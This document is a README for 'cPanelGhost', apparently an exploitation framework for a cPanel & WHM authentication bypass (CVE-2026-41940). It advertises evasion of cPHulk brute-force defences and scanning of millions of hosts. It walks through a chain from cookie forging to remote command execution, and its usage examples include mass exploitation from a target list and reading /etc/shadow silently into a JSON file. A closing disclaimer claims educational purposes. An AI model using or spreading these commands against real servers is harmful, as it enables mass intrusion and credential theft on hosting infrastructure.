cPanelGhost is an exploitation and validation framework for the cPanel & WHM authentication bypass vulnerability (CVE-2026-41940). It is engineered for red teams and infrastructure operators to assess exposure accurately and at scale.
For a comprehensive technical breakdown of the vulnerability mechanics and the session forging process, refer to the watchTowr Labs analysis.
This tool was built to address the operational shortcomings observed in early public exploits, specifically regarding perimeter defense evasion and memory management during wide-scope engagements.
- cPHulk Evasion: Standard exploits attempt to forge sessions by sending invalid credentials to the root account, which immediately triggers cPHulk brute-force protections and results in IP bans. cPanelGhost mints the pre-auth cookie passively via a clean GET request to the login portal. It registers zero failed authentication attempts on the target host.
- O(1) Memory Footprint: Built on an asynchronous generator pipeline. Memory consumption remains flat regardless of the target list size, allowing for the ingestion and scanning of millions of hosts without resource exhaustion.
- Full Chain Execution: Automates the complete attack sequence: passive cookie minting, CRLF payload injection, token extraction, forced internal cache rebuild, and subsequent remote command execution (RCE).
The framework requires Python 3.10+ and relies on a single external dependency for TLS impersonation.
pip install curl_cffi
usage: python3 cpanel_ghost.py [-h] [-u TARGET] [-l TARGET_FILE] [-o OUTPUT] [-c COMMAND] [-t CONCURRENCY] [--timeout TIMEOUT] [--connect-timeout CONNECT_TIMEOUT] [--verify-ssl] [-s]
CVE-2026-41940 Exploitation Framework
1. Single Target Validation
Determine if a single host is vulnerable and extract the administrative token.
python3 cpanel_ghost.py -u https://target:2087/
2. Mass Exploitation with RCE
Ingest a list of targets and execute a command upon successful authentication bypass.
python3 cpanel_ghost.py -l targets.txt -c "id" -t 50
Suppress terminal output and write confirmed hits (including RCE output and extracted tokens) directly to a JSON file. Useful for background execution in CI/CD or distributed scanning pipelines.
python3 cpanel_ghost.py -l targets.txt -c "cat /etc/shadow" -s -o results.json
This software is provided for educational and defensive purposes only. Utilizing this tool against infrastructure without explicit, prior mutual consent is illegal. The author assumes no liability and is not responsible for any misuse or damage caused by this framework.